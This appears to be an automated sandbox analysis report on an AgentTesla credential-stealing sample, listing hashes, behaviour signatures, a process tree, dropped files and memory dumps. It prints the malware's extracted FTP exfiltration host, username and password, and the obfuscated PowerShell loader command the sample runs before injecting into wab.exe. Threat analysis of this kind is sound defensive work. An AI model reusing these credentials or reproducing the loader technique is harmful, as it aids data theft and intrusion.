Overview

overview

10

Static

static

3

3.exe

windows7-x64

7

3.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    144s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-09-2024 14:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3.exe

  • Size

    1.2MB

  • MD5

    ec91d57cb541b3d5867b4972b0883f44

  • SHA1

    77a05550a12646964b23404fca934e6dad232d6e

  • SHA256

    0d51cc75a747abb0b17f859c228b2c15dfea604e90172af3571aa78183a654e8

  • SHA512

    84c8d5cc8d5eaf91a5f7b25eca2d0916dad5c39da9d01375bf7d328c2f8251fad6d57700fa249de03876ffa463c6f85102aa796b02741cd3f6b2602e5a469b88

  • SSDEEP

    24576:IPty3zTcFJHXIh+8xHBe7JvIKSpcG/pQd:IPQ3zTUXMxHYYpcG/2

Score
10/10
agentteslacredential_accessdiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://mail.hearing-vision.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    LILKOOLL14!

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Broses221=Get-Content 'C:\Users\Admin\AppData\Local\Slukredes\Geografiskes.Erf';$Mouseweb=$Broses221.SubString(54605,3);.$Mouseweb($Broses221)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3820

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Slukredes\Geografiskes.Erf
    Filesize

    53KB

    MD5

    0fef6b3f78d915fa4307efa58ffb5122

    SHA1

    0df19588d9258680a1b80296c339d5a328e3cf88

    SHA256

    6dcf1c387ffb2a9962064095e253bb0c4da38ff01a9eef7f93e4a394d979df8d

    SHA512

    cc81f788d0855c2b849030710657df68781900739c66a714a58428b8282c48be013d4c8ed83fc694283e089ad3d7dc2e36965d1c7055cc3e9104a0d88741f2e5

    Download Submit

  • C:\Users\Admin\AppData\Local\Slukredes\Orner.Lan
    Filesize

    310KB

    MD5

    d8b6278f553a79e96b828eb46c8eb49a

    SHA1

    024a687424bd4cb643a6d3cd582d108b25e95615

    SHA256

    63b873e594bf0f10a114779a7181b839134d62eef37cc13a3f501132b76f6e46

    SHA512

    df6dc3f1783474424e61252626fe54b2b850b276b51c0fc08a2ea4cbdf647a4dfc0a0068235c0135c92eb2ad7969c55aadbae85afaac87f5fd996d7acb2e13fe

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y35favpx.5hq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\nsjC238.tmp\nsExec.dll
    Filesize

    6KB

    MD5

    b38561661a7164e3bbb04edc3718fe89

    SHA1

    f13c873c8db121ba21244b1e9a457204360d543f

    SHA256

    c2c88e4a32c734b0cb4ae507c1a9a1b417a2375079111fb1b35fab23aedd41d9

    SHA512

    fedcaac20722de3519382011ccf22314af3edcd11b69f814db14710966853b69b9b5fc98383edcdb64d050ff825264eaba27b1c5adfe61d1fc9d77f13a052ced

    Download Submit

  • memory/3820-58-0x0000000023E60000-0x0000000023E6A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3820-57-0x00000000244F0000-0x0000000024582000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3820-55-0x0000000023E10000-0x0000000023E60000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3820-54-0x00000000012E0000-0x0000000001322000-memory.dmp

    Filesize

    264KB

    Download

  • memory/3820-52-0x00000000012E0000-0x0000000002534000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3820-46-0x0000000077C41000-0x0000000077D61000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/3820-45-0x0000000077CC8000-0x0000000077CC9000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3820-44-0x0000000077C41000-0x0000000077D61000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/4788-21-0x0000000005700000-0x0000000005A54000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4788-42-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-30-0x0000000006280000-0x00000000062A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4788-31-0x0000000007570000-0x0000000007B14000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4788-28-0x0000000006D00000-0x0000000006D96000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4788-33-0x00000000081A0000-0x000000000881A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4788-35-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-36-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-37-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-27-0x0000000005D50000-0x0000000005D9C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4788-39-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-40-0x0000000008820000-0x000000000BB9D000-memory.dmp

    Filesize

    51.5MB

    Download

  • memory/4788-41-0x0000000073FEE000-0x0000000073FEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4788-29-0x0000000006230000-0x000000000624A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4788-43-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-26-0x0000000005D10000-0x0000000005D2E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4788-16-0x0000000005690000-0x00000000056F6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4788-13-0x0000000004F30000-0x0000000004F52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4788-51-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-14-0x0000000005620000-0x0000000005686000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4788-53-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-12-0x0000000004FF0000-0x0000000005618000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4788-11-0x0000000073FE0000-0x0000000074790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4788-10-0x0000000002700000-0x0000000002736000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4788-9-0x0000000073FEE000-0x0000000073FEF000-memory.dmp

    Filesize

    4KB

    Download